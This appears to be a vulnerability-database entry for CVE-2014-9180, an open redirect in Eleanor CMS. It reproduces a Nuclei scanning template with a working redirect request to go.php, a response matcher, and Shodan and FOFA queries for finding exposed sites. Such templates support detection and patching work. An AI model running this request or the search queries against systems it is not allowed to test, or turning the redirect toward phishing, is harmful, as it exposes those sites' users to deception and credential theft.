CVE-2014-9180: Eleanor CMS - Open Redirect

2025-08-01 Eleanor CMS PoC Public

Description

Open redirect vulnerability in go.php in Eleanor CMS allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the QUERY_STRING.

PoC

id: CVE-2014-9180

info:
  name: Eleanor CMS - Open Redirect
  author: Shankar Acharya
  severity: medium
  description: |
    Open redirect vulnerability in go.php in Eleanor CMS allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the QUERY_STRING.
  impact: |
    Attackers can redirect users to malicious sites for phishing attacks, malware distribution, or credential theft.
  remediation: |
    Update to the latest version of Eleanor CMS  to fix the open redirect vulnerability.
  reference:
    - https://packetstormsecurity.com/files/129087/Eleanor-CMS-Open-Redirect.html
    - https://nvd.nist.gov/vuln/detail/CVE-2014-9180
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:N/I:P/A:N
    cvss-score: 5
    cve-id: CVE-2014-9180
    cwe-id: CWE-601
    epss-score: 0.04417
    epss-percentile: 0.90847
    cpe: cpe:2.3:a:eleanor-cms:eleanor_cms:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: eleanor-cms
    product: eleanor_cms
    shodan-query:
      - html:"eleanor"
      - http.html:"eleanor"
      - cpe:"cpe:2.3:a:eleanor-cms:eleanor_cms"
    fofa-query: body="eleanor"
  tags: cve2014,cve,packetstorm,eleanor,cms,redirect,eleanor-cms,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/go.php?http://interact.sh"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# digest: 4a0a0047304502203b783612ce42ab37d6cc5eed6a7ad4d651f593717186fcc0d13c9d84626d85c6022100ea35484cb48f1328e571235966c3f11ec2e6ec37d0d1dde87e5daf6d8ee04642:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities